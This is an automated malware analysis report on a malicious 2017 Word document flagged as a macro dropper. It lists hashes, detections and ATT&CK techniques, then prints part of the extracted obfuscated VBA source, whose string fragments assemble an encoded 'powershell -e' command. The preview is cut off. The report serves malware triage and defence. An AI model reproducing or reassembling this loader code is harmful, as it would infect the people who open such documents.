Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0b22b9592f078cb1…

MALICIOUS

Office (OLE)

67.4 KB Created: 2017-11-02 21:50:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: a2cead92302348e6d9bef96c850c0f38 SHA-1: df805ce70e9e9664b7213d1bc65a0889aaa83d09 SHA-256: 0b22b9592f078cb146c84386614847913a36ede05497224253de2fcc4d7c7da4
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary code, likely downloading and running a secondary payload. ClamAV detection further confirms its malicious nature.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6364202-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6364202-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11082 bytes
SHA-256: c22f941ec63c8aa51237c855a8f3186114cc0c06320697daaa65186142681c15
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 29 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mCkrZzdFc"
Function palzSaHtE()
oWpWEKB = Mid("KmUSQAxADEAOQB+ADQANQBTADEAMQAxAF8AOQA4AEkAMQAwADYAfgAxADAAMQBPADkAOQBfADEAMQA2AEkAMwAyAF8AOAAzAH4AMQAyADEAfgAxADEANQBTADEAMQA2AF8Adz1Pmicz9KsFA6N2di", 4, 128)
rXNTaBYiszK = Mid("4f3sbB7SRsNJKJ2dV2EDqCzbra4vozADAAMgB1ADkANwBEADkAOQB+ADQANgBtADEAMAAwAH4AMQAwADEASQA0ADcARAA4ADUAbRz1wEj", 31, 69)
wOQjqJd = Mid("ntLkHCMGhQSwA2rCHY49Ll9i6wr95WwAxADAAMQBfADEAMAA4AHUAMQAwADgARAA1ADkARAAzADYASQAxADEAOQB+ADEAMAAxAG0AOQA4AG0AOQA5AE8AMQAwADgAbQAxADAANQB7ADEAMAAxAF8AMQAxADAAewAxADEANgBPADMAMgBJADYAMQBfADMAMgB7ADEAMQAwAH4AMQAwADEAcpC", 31, 183)
lUocPcMN = Mid("0Y56k2NMJ8UFDQAewAzADIAewA1ADQAOwA1ADMAewA1ADMAfgA1ADEAfgA1ADQASQA0ADEAbQA1ADkAUwAzADYAbQAxADEAMgTzC8niYiGu1Jz", 13, 85)
dasMz = Mid("LzqDADkAOQBtADEAMAA0AFMAMQAyADMAewAxADEAOQA7ADEAMQA0AHUAMQAwADUAdQAxADEANgBfADEAMAAxAG0ANAA1AE8AMQAwADQAewAxADEAMQBEADEAMQA1AH4AMQAxADYATwAzADIbLJB7nJzZ2NE3D9j2", 5, 139)
jDRAVuUCWHr = Mid("tMIdT9DzN2dR8imzcUTQAMQAxADEAewAxADEANABEADEAMAAwAF8AMQAxADEAOwA0ADUAdQAxADEANgBtADEAMAAxAHUAMQAwADkAdQAxADEAMgA7ADEAMAA4AHUAMN7Ym0NvJp3ciibiGnwM9", 20, 107)
oaFpKQnGph = Mid("tSvYE6kCHaIJADYAUwAzADIATwAxADEANAB7ADkDzzWw", 13, 27)
LaXihUhMuE = Mid("r6tkQjP3wrH2djb0jMQAwADEAbQAxADEANQBJADEAMQA1ADsAMwAyAEQAMwA2AHzNCGGkrs6ViR1i8jV4", 18, 46)
BUVwivWCOGU = Mid("Gset %zoMrjrYWm%=w^er^s&&set %wqUiuKmAI%=falYLhhOP&&set %palzSaHtE%=p^o&&se7Ei5AzY2HEol1K0Jc", 2, 74)
KJsnJq = Mid("Ki30OjhTACcAIAAnACcAIAApACAAIgAgACsAIABbAFMAVAByAEkATgBnAF0AKAAnADMANgBPADEAMQA5AF8AMQAxADUAUwA5ADkAfgAxADEANABPADEAMAA1AHUAMQAxADIAfgAxADEANgBEADMAMgBTADYAMQBEADMAMgBtADEAMQAwAUjE7H", 8, 170)
WqOzYRP = Mid("bi1cSmDR49mDiSDr2hWETCRXvQBTADMAMgB7ADQAMwB7ADMAMgB1ADMAOQA7ADQANgBPADEAMAAxAH4AMQAyADAATwAxADAAMQA7ADMAOQBJADUAOQBtADEAMAAyAH4AMQAxADEATwAxADEANABEADEAbVA9dq", 26, 127)
URtazUKn = Mid("vwawpQYRXFHz49qwwIhZ4j4zADYAfgAYiWJB", 24, 8)
uMrGThuWao = Mid("zXThIUpANwB1ADEAMQAwAH4AMQAwADAAUwAxADEAMQBTADEAMAA5AG0ANQA5AF8AMwA2AHsAMQAxADcAOwAxADEANABEADEAMAA4AG0AMQAxADUARAAzADIAUwA2ADEAbQAzADIAUwAzADkASQAxADAANABfADEAMQA2ADsAMQAxADYAewAxADQSdh2q57UvD7", 8, 175)
EMjVc = Mid("KzG0AMQAwADEAbQAxADEAOQBTADQANQA7ADEAMQAxAEQAOQA4AEQAMQAwADYARAAxADAAMQBTADkAOQB1ADEAMQA2AHUAMwAyAFMANAA1AEkANgA3AH4AMQAxADEAbQAxADAAOQB7ADcAOQBtL1kwol3XT5drDC", 3, 143)
muVjFaKPL = Mid("tS5Jk&&set %qOlMVhCkR%=hel^l&&set %wTtCEjitv%=AHdNrHmMw&&!%palzSaHtE%!!%zoMrjrYWm%!!%qOlMVhCkR%! -e IAAuACgAIAAkAFYAKdS9d9wHXK7bvwKw", 6, 111)
WTndRGr = Mid("9Y1wErH51pMOMjVTrHAA5ADgATwAxADAANgBTADEAMAAxAHUAOQA5AHUAMQAxL4db1aTUIEuGbDbOOEK", 20, 42)
Gvofkth = Mid("k1hj5a3svS3B1ADkANwB1ADEAMQLb9lXPDGzL0fhOMI4pFwUjEz2c", 12, 16)
ZjTWZo = Mid("TFukiMQAwADEAfgAxADAAOQBTADQANgBfADcAOAB7ADEAMAAxAG0AMQAxADYAUwA0ADYAfgA4ADcARAAxADAAMQBEADkAOAB7ADYANwBJADEAMAA4AG0AMQAwADUAUwAxADAAMQA7ADEAMQAwAEkAMQAxADYAbQA1ADkARAAzADYAOwAxlUS26", 6, 172)
QTluDIjmk = Mid("Vs5UaYGO4wYD6WjX0VGAxADEAMgBEADMAMgB+ADQAMwB7ADMAMgBtADMAOQBfADkAMgB+ADMAOQB7ADMAMgBEADQAMwB+ADMAMgBJADMANgBTADEAMQAwAH4AOQA3AEQAMQAwADkAdQAxADAAMsdmKBjkomlITDBH", 20, 127)
XSDSjF = Mid("cTPFY6DG0KsliIfAF8AMQAxADcAdQAxADEANAB7ADEAMAA4AEkAMQAxADUAXwA0ADEAfgAxADIAMwB1ADEAMQA2AFMAMQAxADQAOwAxADIAMQBJADEAMgAzAEkAMwA2AFMAMQAxADkAbQAxADAAMQB+ADkAOABEADkAOQBJADEAMAA4AFMAMQAwADUAfgAxADAAQ6KNz2kHJjiKoZGEH", 16, 180)
fTFir = Mid("OJWlNfEEDSbEjb7ADEAMQA2ADsAMQAwADQAUwA0ADEARAA1ADkAXwA4ADMATwAxADEANgBtADkANwB7ADEAMQA0AEQAMQAxADYATwA0ADUATwA4ADAAfgAxADEANABJADEAMQAxAH4AOQA5AEkAHbQ3kd", 15, 133)
oapYEszoBMb = Mid("OcGtATwAzADYAdQA5ADUATwA0ADYAfgA2ADkAXwAxADIAMABEADkAOQBtADEAMAAxAG0AMQAxADIAfgAxADEANgBtADEAMAp5vE7r", 5, 91)
jkQVUNq = Mid("4VuCAX8sspsTSprRAFQAbwBTAHQAcgBJAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAE8AaQBOACcAJwApACAAKAAgACIAJAAoACAAcwBFAHQALQBWAEEAcgBpAEEAYgBsAGUAIAAnAE8ARgBwz38CioQhNiYWzJWiiF5w", 17, 135)
YLzklaCjDo = Mid("vdSw33mFmRk8
... (truncated)